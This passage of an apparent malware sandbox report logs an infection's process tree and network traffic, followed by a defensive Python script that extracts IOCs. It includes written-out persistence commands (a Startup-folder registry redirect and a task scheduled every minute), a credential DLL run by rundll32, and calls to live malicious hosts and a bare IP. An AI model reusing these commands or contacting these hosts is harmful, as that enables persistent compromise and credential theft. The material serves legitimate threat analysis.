    "C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe"
    2⤵
    • Executes dropped EXE
    PID:4308
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\
      3⤵
      PID:4872
      • C:\Windows\SysWOW64\reg.exe
        REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\
        4⤵
        PID:3112
    • C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nrbux.exe /TR "C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe" /F
      3⤵
      • Creates scheduled task(s)
      PID:4572
    • C:\Windows\SysWOW64\rundll32.exe
      "C:\Windows\System32\rundll32.exe" C:\ProgramData\f1a6a48e76c1fd\cred.dll, Main
      3⤵
      • Blocklisted process makes network request
      • Loads dropped DLL
      PID:5716
• C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
  1⤵
  • Drops file in Windows directory
  • Modifies Internet Explorer settings
  • Modifies registry class
  • Suspicious use of SetWindowsHookEx
  PID:5820
• C:\Windows\system32\browser_broker.exe
  C:\Windows\system32\browser_broker.exe -Embedding
  1⤵
  • Modifies Internet Explorer settings
  PID:5896
• C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  1⤵
  • Modifies registry class
  • Suspicious behavior: MapViewOfSection
  • Suspicious use of SetWindowsHookEx
  PID:4572
• C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  1⤵
  • Modifies Internet Explorer settings
  • Modifies registry class
  PID:4340
• C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  1⤵
  PID:5700
• C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  1⤵
  • Modifies registry class
  PID:1920
• C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  1⤵
  • Modifies registry class
  PID:5748

Network

• flag-unknown
  DNS
  motiwa.xyz
  setup_install.exe
  Remote address:
  8.8.8.8:53
  Request
  motiwa.xyz
  IN A
  Response
  motiwa.xyz
  IN A
  104.21.12.59
  motiwa.xyz
                                                                                                                                                                                        IN A
                                                                                                                                                                                        172.67.193.180
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://motiwa.xyz/addInstall.php?key=125478824515ADNxu2ccbwe&ip=&oid=4&oname[]=25June325AM&oname[]=7&oname[]=1&oname[]=2&oname[]=3&oname[]=4&oname[]=5&oname[]=6&cnt=7
                                                                                                                                                                                        setup_install.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.12.59:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /addInstall.php?key=125478824515ADNxu2ccbwe&ip=&oid=4&oname[]=25June325AM&oname[]=7&oname[]=1&oname[]=2&oname[]=3&oname[]=4&oname[]=5&oname[]=6&cnt=7 HTTP/1.1
                                                                                                                                                                                        Host: motiwa.xyz
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:14:45 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07aaf7250000eba157926000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=SMjWZoJvajng9lBKEhcYVzSCr8tR7NvAEGIzEKJTNQmJa2WlJgRqQDHDxo4qNAWb6wAxDWVS%2FeVgY%2FMyJ1zgGKgjLCBpVR53c%2B8umHvA0XbMezLrMv8DkQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 668614383905eba1-LAX
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        ip-api.com
                                                                                                                                                                                        jooyu.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        ip-api.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        ip-api.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        208.95.112.1
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://ip-api.com/json/
                                                                                                                                                                                        arnatic_4.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        208.95.112.1:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /json/ HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                                        Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                                                                                                                        viewport-width: 1920
                                                                                                                                                                                        Host: ip-api.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:14:46 GMT
                                                                                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                                                                                        Content-Length: 310
                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                        X-Ttl: 48
                                                                                                                                                                                        X-Rl: 41
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://136.144.41.133/server.txt
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        136.144.41.133:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /server.txt HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                                                                                                                                        Host: 136.144.41.133
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        videoconvert-download38.xyz
                                                                                                                                                                                        arnatic_5.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        videoconvert-download38.xyz
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        videoconvert-download38.xyz
                                                                                                                                                                                        IN A
                                                                                                                                                                                        172.67.201.250
                                                                                                                                                                                        videoconvert-download38.xyz
                                                                                                                                                                                        IN A
                                                                                                                                                                                        104.21.42.63
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        email.yg9.me
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        email.yg9.me
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        email.yg9.me
                                                                                                                                                                                        IN A
                                                                                                                                                                                        198.13.62.186
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        email.yg9.me
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        email.yg9.me
                                                                                                                                                                                        IN AAAA
                                                                                                                                                                                        Response
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://videoconvert-download38.xyz/?user=newpb1_1
                                                                                                                                                                                        arnatic_5.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        172.67.201.250:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /?user=newpb1_1 HTTP/1.1
                                                                                                                                                                                        Host: videoconvert-download38.xyz
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:14:50 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=Nno1GeBJNFhexDlDx2VcS8NYiG%2FRe6gSs4W2FURCyRRNlXVGfp2n%2BMUV7f1xapD7rgyIGznWoYlDcxwQ8ooL1q0hddfi2%2B7jqMS4fisjiXQSayBpMEQD1hsJ24aXD280yU77HKX9jhk9"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66861457d8b142d8-LAX
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
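The HTTP records above show four distinct behaviours worth separating during triage: setup_install.exe reporting an install to motiwa.xyz with a campaign key and a list of offers (a pay-per-install style check-in), arnatic_4.exe asking ip-api.com for the victim's geolocation, arnatic_6.exe fetching server.txt from a bare IP with no preceding DNS lookup, and arnatic_5.exe contacting videoconvert-download38.xyz twice with a changing user parameter. The script below is an added example, not code from the Triage report or from the analysed samples; it turns request records of this shape into IOCs and behaviour flags. The request list is constructed from the records on this page, the flag names and the extra geolocation hosts beyond ip-api.com are the example's own assumptions, and the .txt heuristic only marks the fetch for a look at the response body, which the report does not show.

```python
"""Turn the HTTP records of a sandbox report into IOCs and behaviour flags.

Added example; it is not code from the Triage report or from the analysed
samples. Process names, hosts and URLs are taken from this report's Network
records; the request list is constructed from them so the script runs offline.
"""
import ipaddress
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Constructed from the report's Network records: (process, requested URL).
SAMPLE_REQUESTS = [
    ("setup_install.exe",
     "http://motiwa.xyz/addInstall.php?key=125478824515ADNxu2ccbwe&ip=&oid=4"
     "&oname[]=25June325AM&oname[]=7&oname[]=1&oname[]=2&oname[]=3&oname[]=4"
     "&oname[]=5&oname[]=6&cnt=7"),
    ("arnatic_4.exe", "http://ip-api.com/json/"),
    ("arnatic_6.exe", "http://136.144.41.133/server.txt"),
    ("arnatic_5.exe", "https://videoconvert-download38.xyz/?user=newpb1_1"),
    ("arnatic_5.exe", "https://videoconvert-download38.xyz/?user=newpb1_2"),
]

# Public geolocation APIs that stealers query to tag the victim. ip-api.com is
# the one this report shows; the other two are assumed additions to the list.
GEOLOCATION_HOSTS = {"ip-api.com", "ipinfo.io", "api.ipify.org"}


def is_ip_literal(host: str) -> bool:
    """True when the Host is a bare IPv4/IPv6 literal rather than a name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def classify_request(process: str, url: str) -> dict:
    """Return host, path, parsed query and a list of behaviour flags for one request."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    query = parse_qs(parts.query, keep_blank_values=True)
    flags = []
    if is_ip_literal(host):
        # Reached without any DNS query: the address is embedded in the binary.
        flags.append("raw-ip-host")
    if host in GEOLOCATION_HOSTS:
        flags.append("geolocation-lookup")
    if parts.scheme == "http":
        flags.append("cleartext")
    if "key" in query and "cnt" in query and any(k.startswith("oname") for k in query):
        # Campaign key plus a list of offers: pay-per-install style check-in.
        flags.append("install-report")
    if parts.path.endswith(".txt"):
        # Heuristic only: a small text file fetched early often carries the
        # next-stage address, but the response body must be checked to confirm.
        flags.append("text-config-fetch")
    return {"process": process, "host": host, "path": parts.path,
            "query": query, "flags": flags}


def triage(requests):
    """Classify every request and add repeat-contact when a process hits a host twice."""
    results = [classify_request(p, u) for p, u in requests]
    seen = Counter((r["process"], r["host"]) for r in results)
    for r in results:
        if seen[(r["process"], r["host"])] > 1:
            r["flags"].append("repeat-contact")
    return results


def extract_iocs(requests):
    """Split every contacted host into domain names and IP literals, sorted."""
    hosts = {classify_request(p, u)["host"] for p, u in requests}
    return {
        "domains": sorted(h for h in hosts if not is_ip_literal(h)),
        "ips": sorted(h for h in hosts if is_ip_literal(h)),
    }


if __name__ == "__main__":
    for r in triage(SAMPLE_REQUESTS):
        print(f"{r['process']:<18} {r['host']:<30} {','.join(r['flags'])}")
    print(extract_iocs(SAMPLE_REQUESTS))
```

The raw-ip-host flag is the one to act on first: a hard-coded address survives domain takedowns and is trivially blockable, whereas the Cloudflare-fronted domains (motiwa.xyz, videoconvert-download38.xyz) resolve to shared CDN addresses that should be blocked by name, not by IP.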
• flag-unknown
  GET
  https://videoconvert-download38.xyz/?user=newpb1_2
  arnatic_5.exe
  Remote address:
  172.67.201.250:443
  Request
  GET /?user=newpb1_2 HTTP/1.1
  Host: videoconvert-download38.xyz
  Response
  HTTP/1.1 200 OK
  Date: Fri, 02 Jul 2021 07:14:52 GMT
  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        vary: Accept-Encoding
                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=pkIaB%2B6o5dm9gsVB8RYNhkpwo4hgZHC0WvCrL68QVI%2FvA2%2BXunOMB1aIUVKSZAfTOpvQV0Dt6S288xV3J7YNBH8%2Bv2%2Bo%2BvK6CrNqfYPXmLiQfUOfm%2Be1dZSZobwhoYljkUy4no3waGdS"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66861464e8ac42d8-LAX
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://videoconvert-download38.xyz/?user=newpb1_3
                                                                                                                                                                                        arnatic_5.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        172.67.201.250:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /?user=newpb1_3 HTTP/1.1
                                                                                                                                                                                        Host: videoconvert-download38.xyz
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:14:55 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=pTl06bl8BPxRRMrROM9IEbH3mj8YEK5mrrFtal4ufNXzZR%2FurG7ZW%2BqjQ%2BTSaOMph4sEDp5UtDyBrWvLWFrK%2Bx5EpUnsUbTemYRFS38mTox6e8frxXK7OrMlNmD0ulAJZkfgkqH5leum"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66861471892242d8-LAX
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://videoconvert-download38.xyz/?user=newpb1_4
                                                                                                                                                                                        arnatic_5.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        172.67.201.250:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /?user=newpb1_4 HTTP/1.1
                                                                                                                                                                                        Host: videoconvert-download38.xyz
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:14:56 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=kIO8%2BfGBDj4x2SoNditcA6mTh4VTbrxZPLHTtfqmsNeoaZC35kIFLcVmZrnsIgqjGgdXWToiy6r09GYSaLj7iJAy%2B26ua13akQfsQM0Kk0ZY1Sv22AKXaL5InS7BFN6THt4tKPrIrI0J"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66861478c8be42d8-LAX
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://videoconvert-download38.xyz/?user=newpb1_5
                                                                                                                                                                                        arnatic_5.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        172.67.201.250:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /?user=newpb1_5 HTTP/1.1
                                                                                                                                                                                        Host: videoconvert-download38.xyz
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:14:56 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=E9s%2FqGTJjYkcqbItjH%2BePQn1QqUWKRFri3MLXlh3ZtDg7mBT11JoWXhdXexVq79Jbcm2nJnn2hPBSpKHjyR6XFjU5QXs0iv92YS69ER111d13l26J0WuPrETXrCAyjewpJZQhTEqVGiU"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 6686147f2d9342d8-LAX
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://videoconvert-download38.xyz/?user=newpb1_6
                                                                                                                                                                                        arnatic_5.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        172.67.201.250:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /?user=newpb1_6 HTTP/1.1
                                                                                                                                                                                        Host: videoconvert-download38.xyz
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:15:01 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=BxDMWWQZLIsqacbrR5wPwhTLiHKKB8nYZCp3G9QcoIuRyWyui2r%2FdToJCkCxlGEDDnjIuzaspRuEgUNy4QA%2Fqv147GJ%2ByD%2BM3vvaAEtiDWlPVytKIQVV765kAbDqXRCJ%2B4F9YaV9%2B8es"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66861499dfca42d8-LAX
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        www.facebook.com
                                                                                                                                                                                        jooyu.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        www.facebook.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        www.facebook.com
                                                                                                                                                                                        IN CNAME
                                                                                                                                                                                        star-mini.c10r.facebook.com
                                                                                                                                                                                        star-mini.c10r.facebook.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        157.240.240.35
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://www.facebook.com/
                                                                                                                                                                                        arnatic_4.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        157.240.240.35:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET / HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
viewport-width: 1920
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
Host: www.facebook.com
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Set-Cookie: fr=18naQPwUJldxA39Iv..Bg3rzr.8L.AAA.0.0.Bg3rzr.AWVBZs5OhhU; expires=Thu, 30-Sep-2021 07:14:50 GMT; Max-Age=7775999; path=/; domain=.facebook.com; secure; httponly; SameSite=None
Set-Cookie: sb=67zeYDpbc9661wiYKjJX41in; expires=Sun, 02-Jul-2023 07:14:51 GMT; Max-Age=63072000; path=/; domain=.facebook.com; secure; httponly; SameSite=None
x-fb-rlafr: 0
Alt-Svc: h2="facebook24aqddxga4kgbs6ad57bwfb6ly6adpivrxphkrwegy5q26yd.onion:443"; ma=86400
Pragma: no-cache
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
content-security-policy: default-src * data: blob: 'self';script-src *.facebook.com *.fbcdn.net *.facebook.net *.google-analytics.com *.google.com 127.0.0.1:* 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' *;connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self';block-all-mixed-content;upgrade-insecure-requests;
X-Frame-Options: DENY
Strict-Transport-Security: max-age=15552000; preload
Content-Type: text/html; charset="utf-8"
X-FB-Debug: zD23XUe+YJAdqYImX2qE6Hxu0Uz7oRzOKueX/IC9wgZqMobp47YxFyUpIoKHYGU8j78/k38HhjuyUSrPiQJXKw==
Date: Fri, 02 Jul 2021 07:14:51 GMT
Priority: u=3,i
Transfer-Encoding: chunked
Connection: keep-alive

• GET https://www.facebook.com/
Process: arnatic_4.exe
Remote address: 157.240.240.35:443
Request
GET / HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
viewport-width: 1920
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
Host: www.facebook.com
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Set-Cookie: fr=1OiN3r75WSILOjZxK..Bg3rzz.3q.AAA.0.0.Bg3rzz.AWVyHyGO2iU; expires=Thu, 30-Sep-2021 07:14:58 GMT; Max-Age=7775999; path=/; domain=.facebook.com; secure; httponly; SameSite=None
Set-Cookie: sb=87zeYHjRNneUvmkeESL4YY8A; expires=Sun, 02-Jul-2023 07:14:59 GMT; Max-Age=63072000; path=/; domain=.facebook.com; secure; httponly; SameSite=None
x-fb-rlafr: 0
Alt-Svc: h2="facebook2flrj4aii5a2wcjxa73az3b5trndi3pdi5zqji7alwjmfwad.onion:443"; ma=86400
Pragma: no-cache
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
